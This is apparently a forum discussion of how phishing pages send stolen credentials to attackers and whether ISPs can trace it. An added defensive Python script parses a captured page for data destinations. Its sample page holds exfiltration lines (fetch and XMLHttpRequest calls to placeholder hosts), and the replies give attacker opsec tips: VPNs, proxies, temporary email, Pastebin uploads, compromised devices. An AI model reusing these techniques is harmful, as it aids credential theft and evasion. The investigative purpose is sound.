In phishing attacks, how does the data get sent back to the hacker?

So the malicious JavaScript catches the user's password and sends it to the hacker. But what is the exact mechanism of that data transfer, and doesn't it leave the hacker's network information exposed? I.e. couldn't the user's ISP see where it was sent to?

Lots of ways. It’s not always collected via javascript, either.

But think about it this way: you're entering the data on attacker-controlled infrastructure. They will have some script (JS, PHP, or other) that collects it.

This could be stored in a file on the server, the website could make a post (or get) request to another host in the network, or out of it.

There’s no single answer because phishing adversaries have lots of different methods that they can use.

When we investigate phishing, we always try to inspect their script to find out where or how they're collecting the data. Sometimes this is impossible - e.g. if they save it to a file on the server that isn't accessible externally, then we can't get to it, simple as that.

In terms of a request, e.g. they send it to a different server with an HTTP request - then if it's sent in cleartext (e.g. not HTTPS) then yes, the ISP could probably inspect it. Would they? Probably not without a police order.
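As an added example (not part of this thread), this is the kind of throwaway script an investigator might use when, as the reply above describes, they inspect a captured phishing page to find where the form data is being sent. The page content, hostnames and IP are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a captured phishing kit page (hosts/IP are placeholders).
SAMPLE_PAGE = """
<form id="login" action="https://collector.invalid/post.php" method="POST">
  <input name="user"><input name="pass">
</form>
<script>
document.getElementById('login').onsubmit = function(e) {
  e.preventDefault();
  fetch("https://relay.invalid/api/log", {method: "POST", body: new FormData(e.target)});
  var x = new XMLHttpRequest();
  x.open("GET", "http://198.51.100.7/c.php?u=" + encodeURIComponent(user.value));
  x.send();
  location = "https://www.example.com/";   // decoy redirect, not a collection point
};
</script>
"""

# Places a page can hand off submitted data: form action, fetch(), XMLHttpRequest.open().
PATTERNS = [
    re.compile(r'<form[^>]*\baction\s*=\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'\bfetch\s*\(\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'\.open\s*\(\s*["\'](?:GET|POST)["\']\s*,\s*["\']([^"\']+)["\']', re.I),
]


def find_exfil_destinations(html, page_host=None):
    """Return a sorted list of (scheme, host, path) for every URL that a form
    submit or script request in `html` sends data to. A relative URL means the
    data stays on the phishing server itself, so it resolves to page_host.
    A scheme of 'http' means the submission travels in cleartext."""
    found = set()
    for pattern in PATTERNS:
        for url in pattern.findall(html):
            parts = urlparse(url)
            host = parts.netloc or page_host or "(same server)"
            scheme = parts.scheme or "http"
            found.add((scheme, host, parts.path))
    return sorted(found)


if __name__ == "__main__":
    for scheme, host, path in find_exfil_destinations(SAMPLE_PAGE):
        print(f"{scheme}://{host}{path}" + ("  <- cleartext" if scheme == "http" else ""))
```

The redirect to the legitimate site is deliberately not reported; only endpoints that receive the submitted data are.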

Yeah, I was thinking more in terms of something like pyphisher on Kali. It would get sent to a txt file on the Kali machine. That's why I wondered if there had to be a trace between the machine and the JS code on the website that sends it. I heard hacking 101 is never send anything to your own device. I don't want to do this myself, I'm just interested in how the mechanics work since I see so many stories of hacking this year.

Well yes, if it’s as simple as sending a txt file to a device then that could be easily tracked to the destination device.

Those sorts of tools on Kali are really just used for practice or authorized pen testing.

Any hacker who knows what they're doing would never do that - the usual techniques we see in the wild are more like emailing the data to a temporary email address, saving it on the server to be retrieved later, or uploading it in encrypted format to a repository like Pastebin.

It’s hard to say, because different attackers will use different techniques, but there are lots of possibilities. But you’re right on the point - a good hacker will never use their own device. The good ones compromise someone else’s device and use that.

Interesting. I am not sure how it is sent to the device, only that it gets saved in a txt that is already on the device. Would that be traceable even if the attacker used a VPN?

The ISP could be on a server in a country with strong privacy laws. Alternatively they could just email it to an untraceable email address.

But what is the exact mechanism of that data transfer, and doesn't it leave the hacker's network information exposed? I.e. couldn't the user's ISP see where it was sent to?

Yes, but if the hacker uses a VPN with port forwarding, or a proxy server, or a VPS, then the ISP will only see that IP and not the true source the attacker is using to get data off the VPS or proxy.